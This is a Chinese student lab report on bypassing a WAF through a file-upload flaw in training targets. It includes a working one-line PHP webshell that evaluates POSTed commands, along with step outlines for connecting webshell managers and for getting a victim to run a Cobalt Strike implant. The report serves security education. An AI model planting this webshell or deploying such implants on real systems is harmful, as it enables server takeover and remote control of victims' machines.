网络空间安全综合实践：文件上传WAF绕过实验 - 一句话木马与CS工具实战

网络空间安全综合实践：文件上传WAF绕过实验 - 一句话木马与CS工具实战

一句话木马的编写

<?php @eval($_POST['cmd']);phpinfo(); ?>

webshell的连接工具

如何连接webshell

第一步：上传木马文件到目标服务器中

第二步：需要访问木马

第三步：连接木马文件

第四步：shell管理

实验测试

2003的导入虚拟机

写木马文件

访问木马

连接木马

哥斯拉的使用

ladon扫描器

文件上传

http://172.20.69.110/pikachu/
http://172.20.69.110/dvwa/login.php
http://172.20.69.110/sqlit/
http://172.20.69.110/
http://172.20.69.110/phpmyadmin/
http://172.20.69.110/ekucms2.5/

第一步：确定目标地址

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/servercheck.php

第二步：尝试上传文件

http://172.20.69.99:89/pikachu-master/pikachu-master/vul/unsafeupload/uploads/shell.jpg

第三步：抓取上传数据包

第四步：更改数据包

第五步：访问目标

第六步：shell连接

CS的工具

工具下载

启动工具

第一步：打开cs的客户端

第二步：部署服务器端

任务：打开cs.bat

cs木马生成

第一步：设置监听器

第二步：设置cs马

第三步：让被攻击者运行此文件，受害主机上线（双击）

第四步：使用插件增强

实验结果及分析：

本次实验主要围绕文件上传漏洞的实践和绕过方法进行。通过尝试上传文件并抓包分析，成功绕过了WAF，实现了上传一句话木马并连接的过程。同时，也学习了CS工具的使用，成功生成了CS木马并进行了部署和连接。

实验心得：

通过本次实验，我深刻认识到了文件上传漏洞的危害性和实际操作方法，也学习了如何通过CS工具生成木马并进行攻击。实验中需要耐心和细心，尤其是在抓包和更改数据包时需要仔细分析和操作。

实验小结：

文件上传漏洞是常见的web安全漏洞之一，需要我们在网站开发和维护中重视和防范。同时，学习和掌握一些常见的工具和方法，如CS工具和抓包分析等，也是非常必要的。在实践中，要注重安全和合法性，严格遵守法律法规。